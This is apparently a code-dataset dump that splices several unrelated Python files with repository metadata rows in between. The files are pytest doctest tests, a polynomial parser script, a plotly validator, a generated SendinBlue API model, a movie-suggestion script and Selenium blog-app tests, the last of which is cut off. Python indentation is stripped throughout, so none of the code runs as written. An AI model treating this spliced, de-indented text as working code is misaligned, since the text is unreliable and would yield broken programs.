def test_doctest_unex_importerror_with_module(self, testdir):
testdir.tmpdir.join("hello.py").write(_pytest._code.Source("""
import asdalsdkjaslkdjasd
"""))
testdir.maketxtfile("""
>>> import hello
>>>
""")
result = testdir.runpytest("--doctest-modules")
# doctest is never executed because of error during hello.py collection
result.stdout.fnmatch_lines([
"*ERROR collecting hello.py*",
"*{e}: No module named *asdals*".format(e=MODULE_NOT_FOUND_ERROR),
"*Interrupted: 1 errors during collection*",
])
def test_doctestmodule(self, testdir):
p = testdir.makepyfile("""
'''
>>> x = 1
>>> x == 1
False
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(failed=1)
def test_doctestmodule_external_and_issue116(self, testdir):
p = testdir.mkpydir("hello")
p.join("__init__.py").write(_pytest._code.Source("""
def somefunc():
'''
>>> i = 0
>>> i + 1
2
'''
"""))
result = testdir.runpytest(p, "--doctest-modules")
result.stdout.fnmatch_lines([
'004 *>>> i = 0',
'005 *>>> i + 1',
'*Expected:',
"* 2",
"*Got:",
"* 1",
"*:5: DocTestFailure"
])
def test_txtfile_failing(self, testdir):
p = testdir.maketxtfile("""
>>> i = 0
>>> i + 1
2
""")
result = testdir.runpytest(p, "-s")
result.stdout.fnmatch_lines([
'001 >>> i = 0',
'002 >>> i + 1',
'Expected:',
" 2",
"Got:",
" 1",
"*test_txtfile_failing.txt:2: DocTestFailure"
])
def test_txtfile_with_fixtures(self, testdir):
p = testdir.maketxtfile("""
>>> dir = getfixture('tmpdir')
>>> type(dir).__name__
'LocalPath'
""")
reprec = testdir.inline_run(p, )
reprec.assertoutcome(passed=1)
def test_txtfile_with_usefixtures_in_ini(self, testdir):
testdir.makeini("""
[pytest]
usefixtures = myfixture
""")
testdir.makeconftest("""
import pytest
@pytest.fixture
def myfixture(monkeypatch):
monkeypatch.setenv("HELLO", "WORLD")
""")
p = testdir.maketxtfile("""
>>> import os
>>> os.environ["HELLO"]
'WORLD'
""")
reprec = testdir.inline_run(p, )
reprec.assertoutcome(passed=1)
def test_doctestmodule_with_fixtures(self, testdir):
p = testdir.makepyfile("""
'''
>>> dir = getfixture('tmpdir')
>>> type(dir).__name__
'LocalPath'
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=1)
def test_doctestmodule_three_tests(self, testdir):
p = testdir.makepyfile("""
'''
>>> dir = getfixture('tmpdir')
>>> type(dir).__name__
'LocalPath'
'''
def my_func():
'''
>>> magic = 42
>>> magic - 42
0
'''
def unuseful():
pass
def another():
'''
>>> import os
>>> os is os
True
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=3)
def test_doctestmodule_two_tests_one_fail(self, testdir):
p = testdir.makepyfile("""
class MyClass(object):
def bad_meth(self):
'''
>>> magic = 42
>>> magic
0
'''
def nice_meth(self):
'''
>>> magic = 42
>>> magic - 42
0
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(failed=1, passed=1)
def test_ignored_whitespace(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS NORMALIZE_WHITESPACE
""")
p = testdir.makepyfile("""
class MyClass(object):
'''
>>> a = "foo "
>>> print(a)
foo
'''
pass
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=1)
def test_non_ignored_whitespace(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS
""")
p = testdir.makepyfile("""
class MyClass(object):
'''
>>> a = "foo "
>>> print(a)
foo
'''
pass
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(failed=1, passed=0)
def test_ignored_whitespace_glob(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS NORMALIZE_WHITESPACE
""")
p = testdir.maketxtfile(xdoc="""
>>> a = "foo "
>>> print(a)
foo
""")
reprec = testdir.inline_run(p, "--doctest-glob=x*.txt")
reprec.assertoutcome(passed=1)
def test_non_ignored_whitespace_glob(self, testdir):
testdir.makeini("""
[pytest]
doctest_optionflags = ELLIPSIS
""")
p = testdir.maketxtfile(xdoc="""
>>> a = "foo "
>>> print(a)
foo
""")
reprec = testdir.inline_run(p, "--doctest-glob=x*.txt")
reprec.assertoutcome(failed=1, passed=0)
def test_contains_unicode(self, testdir):
"""Fix internal error with docstrings containing non-ascii characters.
"""
testdir.makepyfile(u'''
# encoding: utf-8
def foo():
"""
>>> name = 'с' # not letter 'c' but instead Cyrillic 's'.
'anything'
"""
''')
result = testdir.runpytest('--doctest-modules')
result.stdout.fnmatch_lines([
'Got nothing',
'* 1 failed in*',
])
def test_ignore_import_errors_on_doctest(self, testdir):
p = testdir.makepyfile("""
import asdf
def add_one(x):
'''
>>> add_one(1)
2
'''
return x + 1
""")
reprec = testdir.inline_run(p, "--doctest-modules",
"--doctest-ignore-import-errors")
reprec.assertoutcome(skipped=1, failed=1, passed=0)
def test_junit_report_for_doctest(self, testdir):
"""
#713: Fix --junit-xml option when used with --doctest-modules.
"""
p = testdir.makepyfile("""
def foo():
'''
>>> 1 + 1
3
'''
pass
""")
reprec = testdir.inline_run(p, "--doctest-modules",
"--junit-xml=junit.xml")
reprec.assertoutcome(failed=1)
def test_unicode_doctest(self, testdir):
"""
Test case for issue 2434: DecodeError on Python 2 when doctest contains non-ascii
characters.
"""
p = testdir.maketxtfile(test_unicode_doctest="""
.. doctest::
>>> print(
... "Hi\\n\\nByé")
Hi
...
Byé
>>> 1/0 # Byé
1
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
'*UNEXPECTED EXCEPTION: ZeroDivisionError*',
'*1 failed*',
])
def test_unicode_doctest_module(self, testdir):
"""
Test case for issue 2434: DecodeError on Python 2 when doctest docstring
contains non-ascii characters.
"""
p = testdir.makepyfile(test_unicode_doctest_module="""
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
def fix_bad_unicode(text):
'''
>>> print(fix_bad_unicode('único'))
único
'''
return "único"
""")
result = testdir.runpytest(p, '--doctest-modules')
result.stdout.fnmatch_lines(['* 1 passed *'])
def test_reportinfo(self, testdir):
'''
Test case to make sure that DoctestItem.reportinfo() returns lineno.
'''
p = testdir.makepyfile(test_reportinfo="""
def foo(x):
'''
>>> foo('a')
'b'
'''
return 'c'
""")
items, reprec = testdir.inline_genitems(p, '--doctest-modules')
reportinfo = items[0].reportinfo()
assert reportinfo[1] == 1
def test_valid_setup_py(self, testdir):
'''
Test to make sure that pytest ignores valid setup.py files when ran
with --doctest-modules
'''
p = testdir.makepyfile(setup="""
from setuptools import setup, find_packages
setup(name='sample',
version='0.0',
description='description',
packages=find_packages()
)
""")
result = testdir.runpytest(p, '--doctest-modules')
result.stdout.fnmatch_lines(['*collected 0 items*'])
def test_invalid_setup_py(self, testdir):
'''
Test to make sure that pytest reads setup.py files that are not used
for python packages when ran with --doctest-modules
'''
p = testdir.makepyfile(setup="""
def test_foo():
return 'bar'
""")
result = testdir.runpytest(p, '--doctest-modules')
result.stdout.fnmatch_lines(['*collected 1 item*'])
class TestLiterals(object):
@pytest.mark.parametrize('config_mode', ['ini', 'comment'])
def test_allow_unicode(self, testdir, config_mode):
"""Test that doctests which output unicode work in all python versions
tested by pytest when the ALLOW_UNICODE option is used (either in
the ini file or by an inline comment).
"""
if config_mode == 'ini':
testdir.makeini('''
[pytest]
doctest_optionflags = ALLOW_UNICODE
''')
comment = ''
else:
comment = '#doctest: +ALLOW_UNICODE'
testdir.maketxtfile(test_doc="""
>>> b'12'.decode('ascii') {comment}
'12'
""".format(comment=comment))
testdir.makepyfile(foo="""
def foo():
'''
>>> b'12'.decode('ascii') {comment}
'12'
'''
""".format(comment=comment))
reprec = testdir.inline_run("--doctest-modules")
reprec.assertoutcome(passed=2)
@pytest.mark.parametrize('config_mode', ['ini', 'comment'])
def test_allow_bytes(self, testdir, config_mode):
"""Test that doctests which output bytes work in all python versions
tested by pytest when the ALLOW_BYTES option is used (either in
the ini file or by an inline comment)(#1287).
"""
if config_mode == 'ini':
testdir.makeini('''
[pytest]
doctest_optionflags = ALLOW_BYTES
''')
comment = ''
else:
comment = '#doctest: +ALLOW_BYTES'
testdir.maketxtfile(test_doc="""
>>> b'foo' {comment}
'foo'
""".format(comment=comment))
testdir.makepyfile(foo="""
def foo():
'''
>>> b'foo' {comment}
'foo'
'''
""".format(comment=comment))
reprec = testdir.inline_run("--doctest-modules")
reprec.assertoutcome(passed=2)
def test_unicode_string(self, testdir):
"""Test that doctests which output unicode fail in Python 2 when
the ALLOW_UNICODE option is not used. The same test should pass
in Python 3.
"""
testdir.maketxtfile(test_doc="""
>>> b'12'.decode('ascii')
'12'
""")
reprec = testdir.inline_run()
passed = int(sys.version_info[0] >= 3)
reprec.assertoutcome(passed=passed, failed=int(not passed))
def test_bytes_literal(self, testdir):
"""Test that doctests which output bytes fail in Python 3 when
the ALLOW_BYTES option is not used. The same test should pass
in Python 2 (#1287).
"""
testdir.maketxtfile(test_doc="""
>>> b'foo'
'foo'
""")
reprec = testdir.inline_run()
passed = int(sys.version_info[0] == 2)
reprec.assertoutcome(passed=passed, failed=int(not passed))
class TestDoctestSkips(object):
"""
If all examples in a doctest are skipped due to the SKIP option, then
the tests should be SKIPPED rather than PASSED. (#957)
"""
@pytest.fixture(params=['text', 'module'])
def makedoctest(self, testdir, request):
def makeit(doctest):
mode = request.param
if mode == 'text':
testdir.maketxtfile(doctest)
else:
assert mode == 'module'
testdir.makepyfile('"""\n%s"""' % doctest)
return makeit
def test_one_skipped(self, testdir, makedoctest):
makedoctest("""
>>> 1 + 1 # doctest: +SKIP
2
>>> 2 + 2
4
""")
reprec = testdir.inline_run("--doctest-modules")
reprec.assertoutcome(passed=1)
def test_one_skipped_failed(self, testdir, makedoctest):
makedoctest("""
>>> 1 + 1 # doctest: +SKIP
2
>>> 2 + 2
200
""")
reprec = testdir.inline_run("--doctest-modules")
reprec.assertoutcome(failed=1)
def test_all_skipped(self, testdir, makedoctest):
makedoctest("""
>>> 1 + 1 # doctest: +SKIP
2
>>> 2 + 2 # doctest: +SKIP
200
""")
reprec = testdir.inline_run("--doctest-modules")
reprec.assertoutcome(skipped=1)
def test_vacuous_all_skipped(self, testdir, makedoctest):
makedoctest('')
reprec = testdir.inline_run("--doctest-modules")
reprec.assertoutcome(passed=0, skipped=0)
class TestDoctestAutoUseFixtures(object):
SCOPES = ['module', 'session', 'class', 'function']
def test_doctest_module_session_fixture(self, testdir):
"""Test that session fixtures are initialized for doctest modules (#768)
"""
# session fixture which changes some global data, which will
# be accessed by doctests in a module
testdir.makeconftest("""
import pytest
import sys
@pytest.yield_fixture(autouse=True, scope='session')
def myfixture():
assert not hasattr(sys, 'pytest_session_data')
sys.pytest_session_data = 1
yield
del sys.pytest_session_data
""")
testdir.makepyfile(foo="""
import sys
def foo():
'''
>>> assert sys.pytest_session_data == 1
'''
def bar():
'''
>>> assert sys.pytest_session_data == 1
'''
""")
result = testdir.runpytest("--doctest-modules")
result.stdout.fnmatch_lines('*2 passed*')
@pytest.mark.parametrize('scope', SCOPES)
@pytest.mark.parametrize('enable_doctest', [True, False])
def test_fixture_scopes(self, testdir, scope, enable_doctest):
"""Test that auto-use fixtures work properly with doctest modules.
See #1057 and #1100.
"""
testdir.makeconftest('''
import pytest
@pytest.fixture(autouse=True, scope="{scope}")
def auto(request):
return 99
'''.format(scope=scope))
testdir.makepyfile(test_1='''
def test_foo():
"""
>>> getfixture('auto') + 1
100
"""
def test_bar():
assert 1
''')
params = ('--doctest-modules',) if enable_doctest else ()
passes = 3 if enable_doctest else 2
result = testdir.runpytest(*params)
result.stdout.fnmatch_lines(['*=== %d passed in *' % passes])
@pytest.mark.parametrize('scope', SCOPES)
@pytest.mark.parametrize('autouse', [True, False])
@pytest.mark.parametrize('use_fixture_in_doctest', [True, False])
def test_fixture_module_doctest_scopes(self, testdir, scope, autouse,
use_fixture_in_doctest):
"""Test that auto-use fixtures work properly with doctest files.
See #1057 and #1100.
"""
testdir.makeconftest('''
import pytest
@pytest.fixture(autouse={autouse}, scope="{scope}")
def auto(request):
return 99
'''.format(scope=scope, autouse=autouse))
if use_fixture_in_doctest:
testdir.maketxtfile(test_doc="""
>>> getfixture('auto')
99
""")
else:
testdir.maketxtfile(test_doc="""
>>> 1 + 1
2
""")
result = testdir.runpytest('--doctest-modules')
assert 'FAILURES' not in str(result.stdout.str())
result.stdout.fnmatch_lines(['*=== 1 passed in *'])
@pytest.mark.parametrize('scope', SCOPES)
def test_auto_use_request_attributes(self, testdir, scope):
"""Check that all attributes of a request in an autouse fixture
behave as expected when requested for a doctest item.
"""
testdir.makeconftest('''
import pytest
@pytest.fixture(autouse=True, scope="{scope}")
def auto(request):
if "{scope}" == 'module':
assert request.module is None
if "{scope}" == 'class':
assert request.cls is None
if "{scope}" == 'function':
assert request.function is None
return 99
'''.format(scope=scope))
testdir.maketxtfile(test_doc="""
>>> 1 + 1
2
""")
result = testdir.runpytest('--doctest-modules')
assert 'FAILURES' not in str(result.stdout.str())
result.stdout.fnmatch_lines(['*=== 1 passed in *'])
class TestDoctestNamespaceFixture(object):
SCOPES = ['module', 'session', 'class', 'function']
@pytest.mark.parametrize('scope', SCOPES)
def test_namespace_doctestfile(self, testdir, scope):
"""
Check that inserting something into the namespace works in a
simple text file doctest
"""
testdir.makeconftest("""
import pytest
import contextlib
@pytest.fixture(autouse=True, scope="{scope}")
def add_contextlib(doctest_namespace):
doctest_namespace['cl'] = contextlib
""".format(scope=scope))
p = testdir.maketxtfile("""
>>> print(cl.__name__)
contextlib
""")
reprec = testdir.inline_run(p)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize('scope', SCOPES)
def test_namespace_pyfile(self, testdir, scope):
"""
Check that inserting something into the namespace works in a
simple Python file docstring doctest
"""
testdir.makeconftest("""
import pytest
import contextlib
@pytest.fixture(autouse=True, scope="{scope}")
def add_contextlib(doctest_namespace):
doctest_namespace['cl'] = contextlib
""".format(scope=scope))
p = testdir.makepyfile("""
def foo():
'''
>>> print(cl.__name__)
contextlib
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(passed=1)
class TestDoctestReportingOption(object):
def _run_doctest_report(self, testdir, format):
testdir.makepyfile("""
def foo():
'''
>>> foo()
a b
0 1 4
1 2 4
2 3 6
'''
print(' a b\\n'
'0 1 4\\n'
'1 2 5\\n'
'2 3 6')
""")
return testdir.runpytest("--doctest-modules", "--doctest-report", format)
@pytest.mark.parametrize('format', ['udiff', 'UDIFF', 'uDiFf'])
def test_doctest_report_udiff(self, testdir, format):
result = self._run_doctest_report(testdir, format)
result.stdout.fnmatch_lines([
' 0 1 4',
' -1 2 4',
' +1 2 5',
' 2 3 6',
])
def test_doctest_report_cdiff(self, testdir):
result = self._run_doctest_report(testdir, 'cdiff')
result.stdout.fnmatch_lines([
' a b',
' 0 1 4',
' ! 1 2 4',
' 2 3 6',
' --- 1,4 ----',
' a b',
' 0 1 4',
' ! 1 2 5',
' 2 3 6',
])
def test_doctest_report_ndiff(self, testdir):
result = self._run_doctest_report(testdir, 'ndiff')
result.stdout.fnmatch_lines([
' a b',
' 0 1 4',
' - 1 2 4',
' ? ^',
' + 1 2 5',
' ? ^',
' 2 3 6',
])
@pytest.mark.parametrize('format', ['none', 'only_first_failure'])
def test_doctest_report_none_or_only_first_failure(self, testdir, format):
result = self._run_doctest_report(testdir, format)
result.stdout.fnmatch_lines([
'Expected:',
' a b',
' 0 1 4',
' 1 2 4',
' 2 3 6',
'Got:',
' a b',
' 0 1 4',
' 1 2 5',
' 2 3 6',
])
def test_doctest_report_invalid(self, testdir):
result = self._run_doctest_report(testdir, 'obviously_invalid_format')
result.stderr.fnmatch_lines([
"*error: argument --doctest-report: invalid choice: 'obviously_invalid_format' (choose from*"
])
| 32.386454 | 105 | 0.490405 |
ff1e90e1472653bd3368e620345df18e0e561371 | 654 | py | Python | MultielementPolynomial/src/main.py | LonelySteve/data-structure-and-algorithms-tasks | 4698a5030d8c3c9093933e37e3247e4c76d8d895 | [
"MIT"
] | 1 | 2019-04-17T00:18:13.000Z | 2019-04-17T00:18:13.000Z | MultielementPolynomial/src/main.py | LonelySteve/data-structure-and-algorithms-tasks | 4698a5030d8c3c9093933e37e3247e4c76d8d895 | [
"MIT"
] | null | null | null | MultielementPolynomial/src/main.py | LonelySteve/data-structure-and-algorithms-tasks | 4698a5030d8c3c9093933e37e3247e4c76d8d895 | [
"MIT"
] | null | null | null | from MultielementPolynomial.src.parser.parser import Parser
from MultielementPolynomial.src.mplist import get_mp_struct, convert
def main():
expr_1 = "8*x^9+5*x^8*y^7+3*x^4*y^4+6*y^2-5"
expr_2 = "6*x^5*y^4+7*x^3*y^2+21*x*y^2+8"
p_1 = Parser(expr_1)
ex_1 = p_1.parse()
vars_1 = list(ex_1.vars)
value_1 = ex_1.get_value()
print(get_mp_struct(value_1, vars_1))
p_2 = Parser(expr_2)
ex_2 = p_2.parse()
vars_2 = list(ex_2.vars)
value_2 = ex_2.get_value()
print(get_mp_struct(value_2, vars_2))
mp_1 = convert(ex_1)
mp_2 = convert(ex_2)
print(mp_1 * mp_2)
if __name__ == '__main__':
main()
| 23.357143 | 68 | 0.646789 |
321a2b976f77f6d80094268622882fae99820723 | 427 | py | Python | packages/python/plotly/plotly/validators/bar/_ids.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/bar/_ids.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/bar/_ids.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | import _plotly_utils.basevalidators
class IdsValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(self, plotly_name="ids", parent_name="bar", **kwargs):
super(IdsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
anim=kwargs.pop("anim", True),
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs,
)
| 32.846154 | 71 | 0.644028 |
dc04af8c4672908cae13c830079b386c48ea12c1 | 4,737 | py | Python | sib_api_v3_sdk/models/get_contacts.py | tarraschk/APIv3-python-library | 440883d3a7ca503a655f16bf69cef6c122a95e01 | [
"MIT"
] | 46 | 2018-12-18T21:37:18.000Z | 2022-03-30T20:38:29.000Z | sib_api_v3_sdk/models/get_contacts.py | tarraschk/APIv3-python-library | 440883d3a7ca503a655f16bf69cef6c122a95e01 | [
"MIT"
] | 41 | 2018-03-02T13:22:48.000Z | 2021-11-25T04:32:03.000Z | sib_api_v3_sdk/models/get_contacts.py | tarraschk/APIv3-python-library | 440883d3a7ca503a655f16bf69cef6c122a95e01 | [
"MIT"
] | 45 | 2018-01-22T14:42:32.000Z | 2021-12-16T19:58:45.000Z | # coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501
OpenAPI spec version: 3.0.0
Contact: contact@sendinblue.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetContacts(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'contacts': 'list[object]',
'count': 'int'
}
attribute_map = {
'contacts': 'contacts',
'count': 'count'
}
def __init__(self, contacts=None, count=None): # noqa: E501
"""GetContacts - a model defined in Swagger""" # noqa: E501
self._contacts = None
self._count = None
self.discriminator = None
self.contacts = contacts
self.count = count
@property
def contacts(self):
"""Gets the contacts of this GetContacts. # noqa: E501
:return: The contacts of this GetContacts. # noqa: E501
:rtype: list[object]
"""
return self._contacts
@contacts.setter
def contacts(self, contacts):
"""Sets the contacts of this GetContacts.
:param contacts: The contacts of this GetContacts. # noqa: E501
:type: list[object]
"""
if contacts is None:
raise ValueError("Invalid value for `contacts`, must not be `None`") # noqa: E501
self._contacts = contacts
@property
def count(self):
"""Gets the count of this GetContacts. # noqa: E501
Number of contacts # noqa: E501
:return: The count of this GetContacts. # noqa: E501
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this GetContacts.
Number of contacts # noqa: E501
:param count: The count of this GetContacts. # noqa: E501
:type: int
"""
if count is None:
raise ValueError("Invalid value for `count`, must not be `None`") # noqa: E501
self._count = count
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(GetContacts, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetContacts):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 32.445205 | 856 | 0.568292 |
79e26c86be889bbedce90f1f952afa1e472f6872 | 3,302 | py | Python | backend/suggestion/algo_genre.py | PierreSanson/centrale | 45bf1944c46f22f21b018bd19d8c3b504548d25f | [
"MIT"
] | null | null | null | backend/suggestion/algo_genre.py | PierreSanson/centrale | 45bf1944c46f22f21b018bd19d8c3b504548d25f | [
"MIT"
] | null | null | null | backend/suggestion/algo_genre.py | PierreSanson/centrale | 45bf1944c46f22f21b018bd19d8c3b504548d25f | [
"MIT"
] | null | null | null | import numpy as np
from get_dictionaries import *
import pandas as pd
def meilleur_score(d,n):
liste=[]
new_d={}
for k, v in sorted(d.items(), key=lambda x: x[1]):
liste.append([k,v])
liste.reverse()
for i in range(n):
new_d[liste[i][0]]=liste[i][1]
return new_d
def average_popular(movies,movie):
n=len(movies[movie]['ratings'])
if n<20:
return 0
average=sum([float(movies[movie]['ratings'][rating]) for rating in movies[movie]['ratings']])
return average/n
def best_average_per_genre(movies):
genres={}
for movie in movies:
movie_genres=movies[movie]['genre']
movie_genres=movie_genres.split('|')
for genre in movie_genres:
if genre in genres:
genres[genre][movies[movie]['Name_Year']]=average_popular(movies,movie) #a def
else:
genres[genre]={}
genres[genre][movies[movie]['Name_Year']]=average_popular(movies,movie)
return genres
def suggestion(user,dic_users,movies,average_genres):
dic_user=dic_users[user]
#Cherche le genre favori de l'utilisateur
genres={}
for movie in dic_user:
if float(dic_user[movie])>=4:
id=[key for key in movies if movies[key]['Name_Year']==movie]
if len(id)==1:
genre=movies[id[0]]['genre']
genre=genre.split('|')
for word in genre :
if word in genres:
genres[word]+=1
else:
genres[word]=1
best_genre=[key for key in meilleur_score(genres,1)][0]
print(best_genre)
suggestion=average_genres[best_genre]
for movie in dic_user:
if movie in suggestion:
del suggestion[movie]
suggestion= meilleur_score(suggestion,10)
#Transformer les données en dataframe Panda
result={'movies':[],'score':[]}
for movie in suggestion:
result['movies'].append(movie)
result['score'].append(suggestion[movie])
result['movies'].append(best_genre)
result['score'].append('0')
result=pd.DataFrame(result)
#Créer objet de type JSON
result.to_json ('.\Genre_p.json')
return result
dic_users['josephine']={'The Boss Baby (2017)':'4.5','Coco (2017)':'3.5', 'Shrek the Third (2007)':'4.5','Incredibles 2 (2018)':'4','Princess and the Frog, The (2009)':'5','Finding Nemo (2003)':'4','WALL·E (2008)':'4'}
dic_users['victor']={'Howl`s Moving Castle (Hauru no ugoku shiro) (2004)':'3','Pom Poko (a.k.a. Raccoon War, The) (Heisei tanuki gassen pompoko) (1994)':'4.5','My Neighbor Totoro (Tonari no Totoro) (1988)':'4','Spirited Away (Sen to Chihiro no kamikakushi) (2001)':'5','Your Name. (2016)':'5',"Kiki's Delivery Service (Majo no takkyûbin) (1989)":'3.5',}
dic_users['pierre']={'Spider-Man 2 (2004)':'4','Inception (2010)':'4','Captain America: The First Avenger (2011)':'3.5','Superman/Batman: Public Enemies (2009)':'2','Star Wars: The Last Jedi (2017)':'4.5', 'Matrix Reloaded, The (2003)':'4','Lord of the Rings: The Return of the King, The (2003)':'3','Avengers: Infinity War - Part I (2018)':'5', 'Iron Man 3 (2013)':'3.5','Thor: Ragnarok (2017)':'5',}
print(suggestion('josephine',dic_users,movies,best_average_per_genre(movies)))
| 40.765432 | 401 | 0.61811 |
028fd31cc5e83cc82f56c9c03f08a47797f72754 | 8,484 | py | Python | testproject/pytests/test_blog_post.py | Bebe-ops/conduit | e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08 | [
"MIT"
] | null | null | null | testproject/pytests/test_blog_post.py | Bebe-ops/conduit | e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08 | [
"MIT"
] | null | null | null | testproject/pytests/test_blog_post.py | Bebe-ops/conduit | e06d78ebe9ca72595ddef0f5c7fcfd2868a5fa08 | [
"MIT"
] | null | null | null | from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
from random import randint
from selenium.webdriver.chrome.options import Options
options = Options()
options.headless = True
driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)
def locator(xp):
element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, xp)))
return element
def locators(xp):
element = WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, xp)))
return element
def fill_input_fields_and_send(my_list, field_list, btn):
for _ in range(len(my_list)):
field_list[_].send_keys(my_list[_])
btn.click()
def compare_two_lists(real_list, expected_list, attr):
for _ in range(len(real_list)):
assert real_list[_].get_attribute(attr) == expected_list[_]
def create_text_list(real_list, new_list):
for _ in real_list:
new_list.append(_.text)
# locators
form_input_fields_xp = '//form/fieldset//fieldset//input'
textarea_xp = '//fieldset/textarea'
publish_btn_xp = '//form/button'
home_link_xp = '//nav/div/ul/li/a[contains(text(), "Home")]'
global_feed_list_xp = '//div[@class="home-global"]//a[@class="preview-link"]/h1'
all_pages_link_xp = '//nav/ul/li[@class="page-item"]/a'
logout_xp = '//*[@id="app"]/nav/div/ul/li[5]/a[@active-class="active"]'
# ------------------------------------------------------------------------------------------
# A011_CON_TC10_Új blogbejegyzés (minden mező kitöltése)
def test_new_blog():
url = "http://localhost:1667"
driver.get(url)
time.sleep(2)
# successful registration
registration_xp = '//li[@class="nav-item"]/a[@href="#/register"]'
reg_input_fields_xp = '//input'
sign_up_btn_xp = '//button[contains(text(),"Sign up")]'
notice_btn_xp = '//div[@class="swal-button-container"]/button'
new_article_xp = '//a[@href="#/editor"]'
random_user = f"Hose{randint(1, 100)}"
reg_input_data = [random_user, f"{random_user}@gmail.com", "12ABab@&"]
locator(registration_xp).click()
locators(reg_input_fields_xp)
# registration and save login data in file
login_data = []
for _ in range(len(reg_input_data)):
locators(reg_input_fields_xp)[_].send_keys(reg_input_data[_])
for _ in locators(reg_input_fields_xp)[1:]:
login_data.append(_.get_attribute("value"))
with open("login_data.txt", "w") as login_file: # write data_list in file
for item in login_data:
login_file.write("%s\n" % item)
locator(sign_up_btn_xp).click()
time.sleep(2)
locator(notice_btn_xp).click()
# create new blog_post
expect_elements_placeholder = ["Article Title", "What's this article about?", "Write your article (in markdown)",
"Enter tags"]
random_blog_n = randint(1, 100)
blog_test_data = [f'Summer{random_blog_n}', f'Sun{random_blog_n}',
"There are many variations of passages of Lorem Ipsum available, but the majority have suffered "
"alteration in some form, by injected humour, or randomised words which don't look even slightly "
"believable.", "quality"]
blog_title_xp = '//div[@class="container"]/h1'
blog_paragraph_xp = '//div[@class="row article-content"]//p'
with open('blog_data.txt', "w") as blog_file: # write data_list in file
for _ in blog_test_data:
blog_file.write("%s\n" % _)
locator(new_article_xp).click()
form_input_fields = locators(form_input_fields_xp)
form_input_fields.insert(2, locator(textarea_xp)) # make full form fields
# check placeholders
compare_two_lists(form_input_fields, expect_elements_placeholder, "placeholder")
# fill in form input fields
fill_input_fields_and_send(blog_test_data, form_input_fields, locator(publish_btn_xp))
# check url, blog
time.sleep(2)
expected_blog = blog_test_data[0]
expected_url = f'http://localhost:1667/#/articles/{expected_blog.lower()}'
assert driver.current_url == expected_url
assert locator(blog_title_xp).text == blog_test_data[0]
assert locator(blog_paragraph_xp).text == blog_test_data[2]
# check the blog post is included in the global feed list (all pages)
locator(home_link_xp).click()
locators(global_feed_list_xp)
# create_text_list(from global_feed_list to global_posts)
global_posts = []
all_pages_link = locators(all_pages_link_xp)
for page in all_pages_link:
global_feed_list = locators(global_feed_list_xp)
create_text_list(global_feed_list, global_posts)
page.click()
assert blog_test_data[0] in global_posts
locator(logout_xp).click()
time.sleep(3)
# A012_CON_TC13_Meglévő blogbejegyzésem szerkesztése
def test_mod_and_del_blog():
url = "http://localhost:1667"
driver.get(url)
time.sleep(2)
# login
